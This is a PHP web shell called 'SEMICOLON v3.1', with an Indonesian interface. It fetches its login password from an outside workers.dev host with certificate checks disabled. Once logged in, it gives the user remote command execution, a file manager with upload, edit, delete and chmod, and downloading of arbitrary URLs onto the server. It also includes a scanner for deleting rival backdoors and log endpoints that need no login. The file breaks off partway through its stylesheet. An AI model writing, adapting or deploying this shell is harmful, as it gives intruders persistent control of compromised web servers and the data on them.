<?php
session_start();

header("X-Frame-Options: DENY");
header("X-Content-Type-Options: nosniff");
header("X-XSS-Protection: 1; mode=block");

define('VERSION', '3.1');
define('VERSION_NAME', 'NEO-DIMENSIONAL');

$REMOTE_PASSWORD_URL = "https://morning-surf-852e.gundam808.workers.dev/get-password";

function getPasswordFromRemote() {
    global $REMOTE_PASSWORD_URL;
    if (function_exists('curl_version')) {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $REMOTE_PASSWORD_URL,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_TIMEOUT => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_USERAGENT => 'SemicolonShell/3.1'
        ]);
        $response = curl_exec($ch);
        curl_close($ch);
        return ($response) ? trim($response) : null;
    }
    $response = @file_get_contents($REMOTE_PASSWORD_URL);
    return ($response) ? trim($response) : null;
}

function sanitize_path($path) {
    if (empty($path)) $path = '.';
    $realpath = realpath($path);
    return ($realpath === false) ? '.' : $realpath;
}

function formatBytes($bytes, $precision = 2) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB'];
    $bytes = max($bytes, 0);
    $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
    $pow = min($pow, count($units) - 1);
    return round($bytes / pow(1024, $pow), $precision) . ' ' . $units[$pow];
}

function logActivity($action, $details) {
    $log_dir = __DIR__ . '/logs';
    if (!is_dir($log_dir)) @mkdir($log_dir, 0755, true);
    $log_file = $log_dir . '/semicolon_' . date('Y-m-d') . '.log';
    $entry = date('Y-m-d H:i:s') . ' | IP: ' . ($_SERVER['REMOTE_ADDR'] ?? 'UNKNOWN') . 
             ' | Aksi: ' . $action . ' | ' . $details . PHP_EOL;
    @file_put_contents($log_file, $entry, FILE_APPEND | LOCK_EX);
}

function deleteRecursive($path) {
    if (!file_exists($path)) return false;
    if (is_dir($path)) {
        foreach (array_diff(scandir($path), ['.', '..']) as $item) {
            if (!deleteRecursive($path . '/' . $item)) return false;
        }
        return @rmdir($path);
    }
    return @unlink($path);
}

function executeCommand($cmd) {
    $whitelist = ['pwd','ls','whoami','id','date','uname','php -v','help','cat','echo','grep','find'];
    $base = strtolower(trim(explode(' ', $cmd)[0]));
    if (!in_array($base, $whitelist) && !preg_match('/^(wget|curl)\s+(-O\s+\S+\s+)?https?:\/\/\S+$/i', $cmd)) {
        return ["Perintah diblokir"];
    }
    $danger = ['rm -rf','mkfs','dd','chmod 777','kill','pkill'];
    foreach ($danger as $d) if (stripos($cmd, $d) !== false) return ["Diblokir: berbahaya"];
    
    $output = [];
    if (function_exists('exec')) {
        @exec($cmd . " 2>&1", $output);
    } elseif (function_exists('shell_exec')) {
        $out = @shell_exec($cmd . " 2>&1");
        $output = $out ? explode("\n", trim($out)) : ["Tidak ada output"];
    } else {
        $output = ["Tidak tersedia"];
    }
    logActivity('PERINTAH', $cmd);
    return $output;
}

function scanForBackdoors($path, $type = 'quick') {
    $results = ['suspicious_files' => [], 'file_count' => 0, 'scan_time' => 0, 'scan_path' => $path, 'scan_type' => $type];
    $start = microtime(true);
    
    $patterns = [
        'exec(' => 20, 'system(' => 20, 'shell_exec(' => 20, 'passthru(' => 20,
        'eval(' => 25, 'base64_decode' => 15, 'gzinflate(' => 20, 'file_put_contents(' => 18,
        'assert(' => 25, 'preg_replace' => 18, 'create_function' => 20,
        '$_POST' => 15, '$_GET' => 15, '$_REQUEST' => 15, '`' => 15
    ];
    
    $extensions = ['php', 'phtml', 'php3', 'php4', 'php5', 'php7', 'inc', 'txt'];
    $max_files = ($type == 'deep') ? 5000 : 1500;
    $scanned_files = 0;
    $suspicious = [];
    
    function recursiveScan($dir, &$scanned_files, &$suspicious, $patterns, $extensions, $max_files, $depth = 0) {
        if ($depth > 8 || $scanned_files >= $max_files) return;
        if (!is_dir($dir) || !is_readable($dir)) return;
        
        $items = @scandir($dir);
        if (!$items) return;
        
        foreach ($items as $item) {
            if ($item == '.' || $item == '..') continue;
            $full = $dir . '/' . $item;
            
            if (is_dir($full)) {
                $skip = ['node_modules', 'vendor', 'cache', 'logs', 'tmp', 'temp', '.git', '.svn', 'backup'];
                if (!in_array($item, $skip)) {
                    recursiveScan($full, $scanned_files, $suspicious, $patterns, $extensions, $max_files, $depth + 1);
                }
            } else {
                $ext = strtolower(pathinfo($item, PATHINFO_EXTENSION));
                if (in_array($ext, $extensions)) {
                    $scanned_files++;
                    if ($scanned_files > $max_files) return;
                    
                    $size = @filesize($full);
                    if ($size && $size < 1024 * 1024) {
                        $content = @file_get_contents($full);
                        if ($content) {
                            $score = 0;
                            $found = [];
                            $lower = strtolower($content);
                            
                            foreach ($patterns as $pat => $sc) {
                                if (strpos($lower, strtolower($pat)) !== false) {
                                    $score += $sc;
                                    $found[] = $pat;
                                }
                            }
                            
                            if (preg_match('/eval\s*\(\s*base64_decode/i', $content)) {
                                $score += 30;
                                $found[] = 'eval(base64)';
                            }
                            
                            if (preg_match('/\$\w+\s*\(\s*\$_POST/i', $content) || preg_match('/\$\w+\s*\(\s*\$_GET/i', $content)) {
                                $score += 20;
                                $found[] = 'dynamic_func';
                            }
                            
                            if ($score >= 15) {
                                $suspicious[] = [
                                    'path' => $full,
                                    'name' => $item,
                                    'score' => $score,
                                    'size' => formatBytes($size),
                                    'perms' => substr(sprintf('%o', fileperms($full)), -4),
                                    'patterns' => array_slice(array_unique($found), 0, 5),
                                    'risk' => $score >= 30 ? 'TINGGI' : ($score >= 20 ? 'SEDANG' : 'RENDAH')
                                ];
                            }
                        }
                    }
                }
            }
        }
    }
    
    recursiveScan($path, $scanned_files, $suspicious, $patterns, $extensions, $max_files);
    usort($suspicious, fn($a, $b) => $b['score'] - $a['score']);
    
    $results['file_count'] = $scanned_files;
    $results['suspicious_files'] = $suspicious;
    $results['scan_time'] = round(microtime(true) - $start, 2);
    
    return $results;
}

function quickFileCheck($file_path) {
    if (!file_exists($file_path)) return "File tidak ditemukan";
    if (is_dir($file_path)) return "Ini adalah direktori";
    
    $size = filesize($file_path);
    if ($size > 1024 * 1024) return "File terlalu besar (>1MB)";
    
    $content = file_get_contents($file_path);
    $suspicious = [];
    
    $checks = [
        'exec(' => 'exec()', 'system(' => 'system()', 'shell_exec(' => 'shell_exec()',
        'passthru(' => 'passthru()', 'eval(' => 'eval()', 'base64_decode' => 'base64_decode',
        'gzinflate(' => 'gzinflate()', 'assert(' => 'assert()', 'preg_replace' => 'preg_replace()',
        'create_function' => 'create_function()', '$_POST' => '$_POST', '$_GET' => '$_GET',
        'file_put_contents(' => 'file_put_contents()', '`' => 'backtick'
    ];
    
    foreach ($checks as $pattern => $name) {
        if (strpos($content, $pattern) !== false) {
            $suspicious[] = $name;
        }
    }
    
    if (preg_match('/eval\s*\(\s*base64_decode/i', $content)) $suspicious[] = 'eval(base64)';
    
    return empty($suspicious) ? "BERSIH - Tidak ada pola mencurigakan" : "TERINDIKASI: " . implode(', ', array_slice($suspicious, 0, 8));
}

function getSystemInfo() {
    return [
        'Server' => [
            'Hostname' => php_uname('n'),
            'Sistem Operasi' => php_uname('s') . ' ' . php_uname('r'),
            'PHP' => PHP_VERSION,
            'IP Server' => $_SERVER['SERVER_ADDR'] ?? 'N/A',
            'IP Anda' => $_SERVER['REMOTE_ADDR'] ?? 'N/A'
        ],
        'Sumber Daya' => [
            'Penggunaan Memori' => round(memory_get_usage(true)/1024/1024, 2) . ' MB',
            'Disk Tersedia' => formatBytes(disk_free_space('/')),
            'Disk Total' => formatBytes(disk_total_space('/')),
            'Batas Memori PHP' => ini_get('memory_limit'),
            'Eksekusi Maks' => ini_get('max_execution_time') . 's'
        ]
    ];
}

function getActivityLogs($limit = 100, $filter = null) {
    $log_dir = __DIR__ . '/logs';
    $logs = [];
    
    if (!is_dir($log_dir)) return $logs;
    
    $log_files = glob($log_dir . '/semicolon_*.log');
    rsort($log_files);
    
    foreach ($log_files as $file) {
        $lines = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        if ($lines) {
            foreach (array_reverse($lines) as $line) {
                if ($filter && stripos($line, $filter) === false) continue;
                $logs[] = $line;
                if (count($logs) >= $limit) break 2;
            }
        }
    }
    return $logs;
}

function clearActivityLogs($days_old = 30) {
    $log_dir = __DIR__ . '/logs';
    if (!is_dir($log_dir)) return 0;
    
    $cutoff = strtotime("-{$days_old} days");
    $deleted = 0;
    
    foreach (glob($log_dir . '/semicolon_*.log') as $file) {
        if (filemtime($file) < $cutoff) {
            if (@unlink($file)) $deleted++;
        }
    }
    return $deleted;
}

function getLogStats() {
    $log_dir = __DIR__ . '/logs';
    $stats = [
        'total_logs' => 0,
        'today_logs' => 0,
        'log_size' => 0,
        'oldest_log' => null,
        'latest_log' => null
    ];
    
    if (!is_dir($log_dir)) return $stats;
    
    $today = date('Y-m-d');
    foreach (glob($log_dir . '/semicolon_*.log') as $file) {
        $size = filesize($file);
        $stats['log_size'] += $size;
        
        preg_match('/semicolon_(\d{4}-\d{2}-\d{2})\.log/', $file, $match);
        if (isset($match[1])) {
            if ($match[1] == $today) {
                $stats['today_logs'] = count(file($file));
            }
        }
        
        if (!$stats['oldest_log'] || filemtime($file) < strtotime($stats['oldest_log'])) {
            $stats['oldest_log'] = date('Y-m-d', filemtime($file));
        }
        if (!$stats['latest_log'] || filemtime($file) > strtotime($stats['latest_log'])) {
            $stats['latest_log'] = date('Y-m-d H:i:s', filemtime($file));
        }
    }
    
    foreach (glob($log_dir . '/semicolon_*.log') as $file) {
        $stats['total_logs'] += count(file($file));
    }
    
    $stats['log_size'] = formatBytes($stats['log_size']);
    return $stats;
}

function exportLogs($format = 'text') {
    $logs = getActivityLogs(10000);
    if ($format == 'json') {
        header('Content-Type: application/json');
        header('Content-Disposition: attachment; filename="logs_' . date('Y-m-d') . '.json"');
        echo json_encode(['logs' => $logs, 'exported_at' => date('Y-m-d H:i:s')]);
        exit;
    } else {
        header('Content-Type: text/plain');
        header('Content-Disposition: attachment; filename="logs_' . date('Y-m-d') . '.txt"');
        echo "SEMICOLON ACTIVITY LOGS\n";
        echo "Diekspor: " . date('Y-m-d H:i:s') . "\n";
        echo str_repeat("=", 60) . "\n\n";
        echo implode("\n", $logs);
        exit;
    }
}

if (isset($_GET['ajax_logs'])) {
    header('Content-Type: application/json');
    $filter = $_GET['filter'] ?? null;
    $logs = getActivityLogs(500, $filter);
    echo json_encode(['logs' => $logs, 'count' => count($logs), 'timestamp' => date('Y-m-d H:i:s')]);
    exit;
}

if (isset($_GET['export_logs'])) {
    exportLogs($_GET['export_logs']);
}

if (isset($_POST['clear_old_logs']) || isset($_GET['clear_old_logs'])) {
    header('Content-Type: application/json');
    $deleted = clearActivityLogs(30);
    echo json_encode(['success' => true, 'deleted' => $deleted]);
    exit;
}

if (!isset($_SESSION['authenticated'])) {
    if (isset($_POST['auth_token'])) {
        $input = trim($_POST['auth_token']);
        $real = getPasswordFromRemote();
        $auth_error = null;
        if ($real === null) {
            $auth_error = "Gagal terhubung ke server auth";
        } else {
            $valid = [$real, md5($real), sha1($real), hash('sha256', $real)];
            if (in_array($input, $valid, true)) {
                $_SESSION['authenticated'] = true;
                $_SESSION['current_path'] = $_SERVER['DOCUMENT_ROOT'] ?? '.';
                logActivity('LOGIN', 'Berhasil login');
                header("Location: ?");
                exit;
            } else {
                $auth_error = "Akses ditolak";
            }
        }
    }
    ?><!DOCTYPE html>
<html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>SEMICOLON</title><style>
@keyframes matrixRain{0%{background-position:0% 0%}100%{background-position:0% 100%}}
@keyframes glitchText{0%,100%{text-shadow:-2px 0 #0ff,2px 0 #f0f}33%{text-shadow:2px 0 #0ff,-2px 0 #f0f}66%{text-shadow:-2px 0 #0ff,2px 0 #f0f}}
@keyframes fadeInScale{0%{opacity:0;transform:scale(0.9)}100%{opacity:1;transform:scale(1)}}
@keyframes borderGlow{0%,100%{border-color:#0f0;box-shadow:0 0 10px rgba(0,255,0,0.3)}50%{border-color:#0ff;box-shadow:0 0 30px rgba(0,255,255,0.6)}}
*{margin:0;padding:0;box-sizing:border-box}
body{background:#000;color:#0f0;font-family:'Courier New',monospace;min-height:100vh;overflow-x:hidden;position:relative}
#matrix-canvas{position:fixed;top:0;left:0;width:100%;height:100%;z-index:0;opacity:0.35}
.login-wrapper{position:relative;z-index:10;display:flex;align-items:center;justify-content:center;min-height:100vh;padding:20px}
.login-box{background:rgba(0,10,0,0.85);backdrop-filter:blur(15px);border:2px solid #0f0;padding:45px;border-radius:25px;width:400px;animation:fadeInScale 0.5s ease-out,borderGlow 3s infinite;box-shadow:0 0 60px rgba(0,255,0,0.2)}
.login-title{text-align:center;font-size:32px;margin-bottom:10px;font-weight:bold;animation:glitchText 2s infinite}
.login-sub{text-align:center;font-size:11px;margin-bottom:35px;opacity:0.7}
.login-input{width:100%;padding:14px;margin:15px 0;background:rgba(0,0,0,0.7);border:1px solid #0f0;color:#0f0;border-radius:12px;font-family:monospace;transition:0.3s}
.login-input:focus{outline:none;border-color:#0ff;box-shadow:0 0 20px #0ff;transform:scale(1.02)}
.login-btn{width:100%;padding:14px;background:linear-gradient(135deg,#0f0,#0a0);color:#000;border:none;font-weight:bold;cursor:pointer;border-radius:12px;font-size:16px;transition:0.3s}
.login-btn:hover{transform:scale(1.03);box-shadow:0 0 30px #0f0}
.login-error{color:#f00;text-align:center;margin-bottom:15px;text-shadow:0 0 5px #f00}
</style></head>
<body>
<canvas id="matrix-canvas"></canvas>
<div class="login-wrapper"><div class="login-box"><div class="login-title">;; SEMICOLON ;;</div><div class="login-sub"><?php echo VERSION_NAME; ?></div>
<?php if(isset($auth_error)) echo '<div class="login-error">'.$auth_error.'</div>'; ?>
<form method="post"><input type="password" name="auth_token" class="login-input" placeholder="MASUKKAN PASSWORD" autofocus><button type="submit" class="login-btn">⚡ INITIALIZE</button></form></div></div>
<script>
const canvas=document.getElementById('matrix-canvas'),ctx=canvas.getContext('2d');
canvas.width=window.innerWidth;canvas.height=window.innerHeight;
const chars='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$#@%&!?.;:<>/\\|';
const fontSize=16;let columns=Math.floor(canvas.width/fontSize);
let drops=[];for(let i=0;i<columns;i++)drops[i]=Math.random()*-100;
function drawMatrix(){ctx.fillStyle='rgba(0,0,0,0.04)';ctx.fillRect(0,0,canvas.width,canvas.height);ctx.fillStyle='#0f0';ctx.font=fontSize+'px monospace';for(let i=0;i<drops.length;i++){const char=chars[Math.floor(Math.random()*chars.length)];ctx.fillText(char,i*fontSize,drops[i]*fontSize);if(drops[i]*fontSize>canvas.height&&Math.random()>0.975)drops[i]=0;drops[i]++}}
setInterval(drawMatrix,50);window.addEventListener('resize',()=>{canvas.width=window.innerWidth;canvas.height=window.innerHeight;columns=Math.floor(canvas.width/fontSize);drops=[];for(let i=0;i<columns;i++)drops[i]=Math.random()*-100;});
</script></body></html><?php
    exit;
}

$current_path = $_SESSION['current_path'] ?? ($_SERVER['DOCUMENT_ROOT'] ?? '.');
if (isset($_GET['path'])) {
    $new_path = realpath($_GET['path']);
    if ($new_path && is_dir($new_path)) {
        $current_path = $new_path;
        $_SESSION['current_path'] = $current_path;
    }
}

$current_tab = $_GET['tab'] ?? 'files';

$folders = []; $files = [];
if (is_dir($current_path) && is_readable($current_path)) {
    $items = scandir($current_path);
    if ($items) {
        foreach ($items as $item) {
            if ($item == '.' || $item == '..') continue;
            $full = $current_path . '/' . $item;
            $data = [
                'name' => $item,
                'path' => $full,
                'is_dir' => is_dir($full),
                'perms' => substr(sprintf('%o', fileperms($full)), -4),
                'modified' => date('Y-m-d H:i:s', filemtime($full))
            ];
            if ($data['is_dir']) {
                $data['size'] = '-';
                $folders[] = $data;
            } else {
                $data['size'] = formatBytes(filesize($full));
                $files[] = $data;
            }
        }
    }
}
usort($folders, fn($a,$b)=>strcasecmp($a['name'],$b['name']));
usort($files, fn($a,$b)=>strcasecmp($a['name'],$b['name']));

$edit_content = null;
$edit_file_path = null;
if (isset($_GET['edit'])) {
    $edit_path = realpath($_GET['edit']);
    if ($edit_path && file_exists($edit_path) && !is_dir($edit_path)) {
        if (is_readable($edit_path)) {
            $edit_content = htmlspecialchars(file_get_contents($edit_path));
            $edit_file_path = $edit_path;
            $current_tab = 'edit';
        } else {
            $_SESSION['error'] = "Tidak bisa membaca file: " . basename($edit_path);
        }
    } else {
        $_SESSION['error'] = "File tidak ditemukan";
    }
}

$scan_results = null;
if (isset($_POST['start_scan'])) {
    $scan_path = $_POST['scan_path'] ?? $current_path;
    $scan_type = $_POST['scan_type'] ?? 'quick';
    if (is_dir($scan_path)) {
        $scan_results = scanForBackdoors($scan_path, $scan_type);
        $_SESSION['scan_results'] = $scan_results;
    } else {
        $_SESSION['error'] = "Path scan tidak valid: " . htmlspecialchars($scan_path);
    }
}

if (isset($_SESSION['scan_results'])) {
    $scan_results = $_SESSION['scan_results'];
}

$quick_check_result = null;
$checked_file = null;
if (isset($_POST['quick_check']) && isset($_POST['file_path'])) {
    $file_path = $_POST['file_path'];
    if (file_exists($file_path)) {
        $quick_check_result = quickFileCheck($file_path);
        $checked_file = $file_path;
        $_SESSION['quick_check_result'] = $quick_check_result;
        $_SESSION['checked_file'] = $checked_file;
    } else {
        $_SESSION['error'] = "File tidak ditemukan: " . htmlspecialchars($file_path);
    }
}

if (isset($_SESSION['quick_check_result'])) {
    $quick_check_result = $_SESSION['quick_check_result'];
    $checked_file = $_SESSION['checked_file'] ?? null;
}

if (isset($_POST['delete_backdoor']) && isset($_POST['backdoor_path'])) {
    $file = $_POST['backdoor_path'];
    if (file_exists($file) && unlink($file)) {
        $_SESSION['success'] = "Dihapus: " . basename($file);
        logActivity('BACKDOOR_DELETE', $file);
        if (isset($_SESSION['scan_results'])) unset($_SESSION['scan_results']);
    } else {
        $_SESSION['error'] = "Gagal menghapus: " . basename($file);
    }
    header("Location: ?tab=scanner");
    exit;
}

if (isset($_POST['delete_selected_backdoors']) && isset($_POST['backdoor_files'])) {
    $del = 0;
    foreach ($_POST['backdoor_files'] as $f) {
        if (file_exists($f) && unlink($f)) $del++;
    }
    $_SESSION['success'] = "Dihapus $del backdoor";
    if (isset($_SESSION['scan_results'])) unset($_SESSION['scan_results']);
    header("Location: ?tab=scanner");
    exit;
}

if (isset($_POST['bulk_delete']) && isset($_POST['selected_items'])) {
    $deleted = 0;
    foreach ($_POST['selected_items'] as $item) {
        if (deleteRecursive($item)) $deleted++;
    }
    $_SESSION['success'] = "Dihapus $deleted item";
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_GET['delete'])) {
    if (deleteRecursive($_GET['delete'])) $_SESSION['success'] = "Dihapus";
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_POST['rename'])) {
    $old = $_POST['old_path'];
    $new = dirname($old) . '/' . trim($_POST['new_name']);
    if (!empty($_POST['new_name']) && !file_exists($new) && rename($old, $new)) {
        $_SESSION['success'] = "Berhasil ganti nama";
        logActivity('GANTI_NAMA', "$old -> $new");
    }
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_POST['chmod']) && isset($_POST['chmod_path']) && isset($_POST['permission'])) {
    @chmod($_POST['chmod_path'], octdec($_POST['permission']));
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_POST['bulk_chmod']) && isset($_POST['selected_items']) && isset($_POST['bulk_permission'])) {
    $perm = $_POST['bulk_permission'];
    if (preg_match('/^[0-7]{3,4}$/', $perm)) {
        $ok = 0;
        foreach ($_POST['selected_items'] as $item) {
            if (@chmod($item, octdec($perm))) $ok++;
        }
        $_SESSION['success'] = "Diubah $ok item ke $perm";
    }
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_POST['upload']) && isset($_FILES['files'])) {
    $uploaded = 0;
    foreach ($_FILES['files']['name'] as $i => $name) {
        if ($_FILES['files']['error'][$i] == UPLOAD_ERR_OK) {
            $dest = $current_path . '/' . basename($name);
            if (!file_exists($dest) && move_uploaded_file($_FILES['files']['tmp_name'][$i], $dest)) {
                $uploaded++;
                logActivity('UPLOAD', $name);
            }
        }
    }
    $_SESSION['success'] = "Terupload $uploaded file";
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_POST['create_file'])) {
    $name = basename($_POST['filename']);
    if (!empty($name)) {
        $file_path = $current_path . '/' . $name;
        if (!file_exists($file_path)) {
            @touch($file_path);
            $_SESSION['success'] = "Dibuat: $name";
            logActivity('BUAT_FILE', $name);
        } else {
            $_SESSION['error'] = "File sudah ada: $name";
        }
    }
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_POST['create_folder'])) {
    $name = basename($_POST['foldername']);
    if (!empty($name) && !is_dir($current_path . '/' . $name)) {
        @mkdir($current_path . '/' . $name, 0755);
        $_SESSION['success'] = "Dibuat folder: $name";
        logActivity('BUAT_FOLDER', $name);
    }
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_POST['edit_file']) && isset($_POST['file_path']) && isset($_POST['file_content'])) {
    $file = $_POST['file_path'];
    if (file_exists($file) && is_writable($file)) {
        $backup_dir = __DIR__ . '/backups';
        if (!is_dir($backup_dir)) @mkdir($backup_dir, 0755, true);
        @copy($file, $backup_dir . '/' . basename($file) . '_' . date('Ymd_His') . '.bak');
        
        if (file_put_contents($file, $_POST['file_content']) !== false) {
            $_SESSION['success'] = "File berhasil disimpan!";
            logActivity('EDIT_FILE', $file);
        } else {
            $_SESSION['error'] = "Gagal menyimpan file (izin ditolak?)";
        }
    } else {
        $_SESSION['error'] = "Tidak bisa menulis ke file: " . basename($file);
    }
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_POST['download_url_submit'])) {
    $url = $_POST['download_url'];
    $name = !empty($_POST['filename']) ? basename($_POST['filename']) : basename($url);
    $dest = $current_path . '/' . $name;
    $data = @file_get_contents($url);
    if ($data && file_put_contents($dest, $data)) {
        $_SESSION['success'] = "Download: $name";
        logActivity('URL_DOWNLOAD', $url);
    } else $_SESSION['error'] = "Download gagal";
    header("Location: ?path=" . urlencode($current_path) . "&tab=files");
    exit;
}

if (isset($_POST['terminal_cmd'])) {
    $cmd = trim($_POST['terminal_cmd']);
    if (preg_match('/^wget\s+(-O\s+(\S+)\s+)?(https?:\/\/\S+)/i', $cmd, $m)) {
        $url = $m[3];
        $name = !empty($m[2]) ? basename($m[2]) : basename($url);
        $dest = $current_path . '/' . $name;
        $data = @file_get_contents($url);
        $out = ($data && file_put_contents($dest, $data)) ? "Download $name berhasil" : "Gagal";
        $_SESSION['terminal_output'] = $out;
    } else {
        $out = executeCommand($cmd);
        $_SESSION['terminal_output'] = implode("\n", $out);
    }
    $_SESSION['last_command'] = $cmd;
    header("Location: ?path=" . urlencode($current_path) . "&tab=terminal");
    exit;
}

if (isset($_GET['download'])) {
    $file = $_GET['download'];
    if (file_exists($file) && !is_dir($file)) {
        logActivity('DOWNLOAD', $file);
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file).'"');
        readfile($file);
        exit;
    }
}

if (isset($_GET['logout'])) {
    logActivity('LOGOUT', 'Pengguna keluar');
    session_destroy();
    header("Location: ?");
    exit;
}

$parent_path = dirname($current_path);
$can_go_back = ($parent_path != $current_path && is_dir($parent_path) && $parent_path != '.');

?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>SEMICOLON v<?php echo VERSION; ?> | NEO</title>
<style>
@keyframes matrixRain {
    0% { background-position: 0% 0%; }
    100% { background-position: 0% 100%; }
}
@keyframes glitch {
    0%,100% { text-shadow: -2px 0 #0ff, 2px 0 #f0f; }
    33% { text-shadow: 2px 0 #0ff, -2px 0 #f0f; }
    66% { text-shadow: -2px 0 #0ff, 2px 0 #f0f; }
}
@keyframes fadeInUp {
    from { opacity: 0; transform: translateY(30px); }
    to { opacity: 1; transform: translateY(0); }
}
@keyframes borderPulse {
    0%,100% { border-color: #0f0; box-shadow: 0 0 10px rgba(0,255,0,0.3); }
    50% { border-color: #0ff; box-shadow: 0 0 25px rgba(0,255,255,0.6); }
}
@keyframes glowPulse {
    0%,100% { filter: drop-shadow(0 0 2px #0f0); }
    50% { filter: drop-shadow(0 0 8px #0ff); }
}
* { margin: 0; padding: 0; box-sizing: border-box; }
body { 
    background: #000; 
    color: #0f0; 
    font-family: 'Courier New', monospace; 
    font-size: 14px; 
    position: relative; 
    overflow-x: hidden;
    min-height: 100vh;
}
#bg-canvas {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: 0;
    opacity: 0.4;
}
.container {
    max-width: 1400px;
    margin: 0 auto;
    padding: 20px;
    position: relative;
    z-index: 1;
    animation: fadeInUp 0.6s ease-out;
}
.header {
    background: rgba(0, 15, 0, 0.85);
    backdrop-filter: blur(12px);
    border-bottom: 2px solid #0f0;
    padding: 15px 25px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    flex-wrap: wrap;
    margin-bottom: 20px;
    border-radius: 12px 12px 0 0;
    animation: borderPulse 3s infinite;
}
.title {
    font-size: 24px;
    font-weight: bold;
    animation: glitch 2s infinite;
}
.badge {
    background: rgba(0, 255, 0, 0.2);
    padding: 4px 12px;
    border-radius: 20px;
    font-size: 11px;
    border: 1px solid #0f0;
    margin-left: 12px;
}
.logout {
    background: linear-gradient(135deg, #0f0, #0a0);
    color: #000;
    padding: 8px 18px;
    border-radius: 8px;
    text-decoration: none;
    font-weight: bold;
    transition: 0.3s;
    animation: glowPulse 2s infinite;
}
.logout:hover {
    transform: scale(1.05);
    box-shadow: 0 0 20px #0f0;
}
.tabs {
    display: flex;
    flex-wrap: wrap;
    gap: 3px;
    background: rgba(0, 25, 0, 0.8);
    backdrop-filter: blur(8px);
    padding: 10px 20px;
    margin-bottom: 20px;
    border-radius: 10px;
}
.tab {
    background: transparent;
    border: none;
    color: #0f0;
    padding: 10px 22px;
    cursor: pointer;
    font-family: monospace;
    font-size: 14px;
    border-radius: 7px;
    transition: 0.3s;
}
.tab.active, .tab:hover {
    background: #0f0;
    color: #000;
    font-weight: bold;
    box-shadow: 0 0 15px #0f0;
    transform: translateY(-2px);
}
.path-bar {
    background: rgba(0, 20, 0, 0.9);
    backdrop-filter: blur(8px);
    padding: 12px 20px;
    border: 1px solid #0f0;
    margin-bottom: 20px;
    display: flex;
    flex-wrap: wrap;
    align-items: center;
    gap: 15px;
    border-radius: 10px;
}
.back-btn {
    background: linear-gradient(135deg, #003300, #001a00);
    color: #0f0;
    border: 1px solid #0f0;
    padding: 7px 18px;
    cursor: pointer;
    font-family: monospace;
    font-size: 13px;
    border-radius: 7px;
    text-decoration: none;
    transition: 0.3s;
}
.back-btn:hover:not(.disabled) {
    background: #0f0;
    color: #000;
    transform: translateX(-5px);
    box-shadow: 0 0 12px #0f0;
}
.back-btn.disabled {
    opacity: 0.4;
    pointer-events: none;
}
.current-path {
    word-break: break-all;
    flex: 1;
    font-size: 12px;
    font-family: monospace;
}
.tool-bar {
    background: rgba(0, 20, 0, 0.9);
    backdrop-filter: blur(8px);
    padding: 15px 20px;
    display: flex;
    flex-wrap: wrap;
    gap: 10px;
    border-bottom: 1px solid #0f0;
    margin-bottom: 20px;
    border-radius: 10px;
}
.btn {
    background: linear-gradient(135deg, #003300, #001a00);
    color: #0f0;
    border: 1px solid #0f0;
    padding: 8px 18px;
    cursor: pointer;
    font-family: monospace;
    font-size: 12px;
    border-radius: 7px;
    transition: 0.3s;
}
.btn:hover {
    background: #0f0;
    color: #000;
    transform: translateY(-2px);
    box-shadow: 0 5px 15px rgba(0, 255, 0, 0.3);
}
.btn-danger {
    border-color: #f00;
    color: #f00;
    background: linear-gradient(135deg, #330000, #1a0000);
}
.btn-danger:hover {
    background: #f00;
    color: #000;
    box-shadow: 0 0 15px #f00;
}
table {
    width: 100%;
    border-collapse: collapse;
    margin-top: 15px;
    border-radius: 10px;
    overflow: hidden;
}
th, td {
    padding: 10px 8px;
    border: 1px solid #0f0;
    text-align: left;
}
th {
    background: rgba(0, 35, 0, 0.9);
    font-weight: bold;
}
tr:hover td {
    background: rgba(0, 50, 0, 0.5);
    transition: 0.2s;
}
.dir-link {
    color: #0ff;
    cursor: pointer;
    text-decoration: none;
    font-weight: bold;
    transition: 0.2s;
}
.dir-link:hover {
    text-decoration: underline;
    text-shadow: 0 0 8px #0ff;
}
.file-link {
    color: #0f0;
    text-decoration: none;
    transition: 0.2s;
}
.file-link:hover {
    text-decoration: underline;
    text-shadow: 0 0 5px #0f0;
}
.checkbox-cell {
    width: 30px;
    text-align: center;
}
.actions {
    white-space: nowrap;
}
.small-btn {
    background: rgba(0, 50, 0, 0.8);
    border: 1px solid #0f0;
    padding: 4px 9px;
    font-size: 10px;
    cursor: pointer;
    border-radius: 5px;
    color: #0f0;
    margin: 0 2px;
    transition: 0.2s;
}
.small-btn:hover {
    background: #0f0;
    color: #000;
    transform: scale(1.05);
}
.modal {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.98);
    z-index: 1000;
    align-items: center;
    justify-content: center;
    backdrop-filter: blur(10px);
}
.modal-content {
    background: linear-gradient(135deg, #001100, #000a00);
    border: 2px solid #0f0;
    padding: 30px;
    border-radius: 20px;
    min-width: 350px;
    max-width: 90%;
    animation: fadeInUp 0.3s ease-out;
    box-shadow: 0 0 50px rgba(0, 255, 0, 0.2);
}
.modal-title {
